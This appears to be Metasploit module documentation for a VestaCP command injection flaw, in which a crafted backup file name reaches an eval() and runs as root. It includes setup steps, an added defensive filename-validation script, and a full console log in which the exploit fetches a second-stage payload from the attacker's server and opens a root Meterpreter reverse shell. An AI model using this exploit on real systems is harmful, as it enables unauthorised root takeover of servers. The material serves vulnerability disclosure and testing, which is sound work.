This module exploits a command injection vulnerability in the v-list-user-backups bash script. Low privileged authenticated users can execute arbitrary commands in the context of the root user.
To exploit this vulnerability, an authenticated attacker with low privileges requests that VestaCP back up a file whose file name starts with a '.', followed by the ';' character to terminate the current command, and finally the command they wish to execute. During the user backup process this file name is evaluated by the v-backup-user bash script, which does not perform appropriate input validation before passing the file name to an eval() call. As a result, when the attacker lists the existing backups, the injected command is executed by the v-backup-user bash script and runs as the root user.
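As an added example (not VestaCP's own code), the following hypothetical POSIX sh allowlist check is the kind of validation the backup script lacks: a file name is only accepted if it is non-empty, does not begin with '.', and contains nothing outside a conservative character set, so names carrying ';' or other shell metacharacters never reach an eval.

```shell
#!/bin/sh
# Added example, not part of VestaCP: a hypothetical allowlist check that a
# backup script could apply to a file name before interpolating it into a
# shell command.

# Returns 0 when the name is safe to hand to a command, 1 otherwise.
is_safe_backup_name() {
    name="$1"
    case "$name" in
        "" ) return 1 ;;                    # empty name
        .* ) return 1 ;;                    # hidden names, the vector described above
        *[!-A-Za-z0-9._]* ) return 1 ;;     # anything outside [A-Za-z0-9._-], e.g. ';'
    esac
    return 0
}

# Counts how many of the given names pass the check; used on constructed
# sample input below so the filter's behaviour can be seen at a glance.
count_safe() {
    n=0
    for f in "$@"; do
        if is_safe_backup_name "$f"; then
            n=$((n + 1))
        else
            printf 'rejected: %s\n' "$f" >&2
        fi
    done
    echo "$n"
}

# Constructed sample names: two are accepted, the rest are rejected.
count_safe site-2020.tar .hidden 'name;id' 'a b' ok-1.tgz
```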
You can install Vesta Control Panel on an Ubuntu 18.04 LTS server with the following commands:
ssh root@your.server
curl -O http://vestacp.com/pub/vst-install.sh
bash vst-install.sh
Once you have finished the installation, perform the following actions in order to create an unprivileged user:
1 - Go to https://IP ADDR:8083/
2 - Login with your administrator account.
3 - Click on the "User" section under the top navigation menu. When you move your mouse over the text for the "User" section, it will turn orange. This is the link that you need to click!
4 - The URL in your browser should now be https://IP ADDR:8083/list/user/
5 - Click on the green plus sign on the left side of the page. When you move your mouse over this button, it will say "ADD USER".
6 - In the following user creation form that appears, enter values for the "user", "password", "email", "first name", and "last name" fields. Leave package and language options as is, as these fields do not affect exploitation.
7 - Log out of your admin account.
8 - Browse to https://IP ADDR:8083/
9 - Verify that the new low privileged user has been created and that you can log in using their credentials.
A successful check of the exploit will look similar to the output shown below:
- Start msfconsole
- Run: use exploit/linux/http/vestacp_exec
- Set RHOST
- Set LHOST
- Set USERNAME
- Set PASSWORD
- Set SRVHOST
- Set SRVPORT
- Run: exploit
- Verify that you are seeing "Successfully authenticated to the FTP service" in the console.
- Verify that you are seeing "Successfully uploaded the payload as a file name" in the console.
- Verify that you are seeing "Successfully authenticated to the HTTP Service" in the console.
- Verify that you are seeing "Scheduled backup has been started. Exploitation may take up to 5 minutes." in the console.
- Verify that you are seeing "It seems there is an active backup process ! Recheck after 30 second. Zzzzzz..." in the console.
- Verify that you are seeing "First stage is executed ! Sending 2nd stage of the payload" in the console.
- Verify that you are getting a Meterpreter session.
msf5 > use exploit/linux/http/vestacp_exec
msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
RHOSTS => 192.168.74.218
msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
USERNAME => user11
msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1
SRVHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
SRVPORT => 8081
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started !
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300
msf5 exploit(linux/http/vestacp_exec) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > shell
Process 42978 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
meterpreter > shell
[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3
#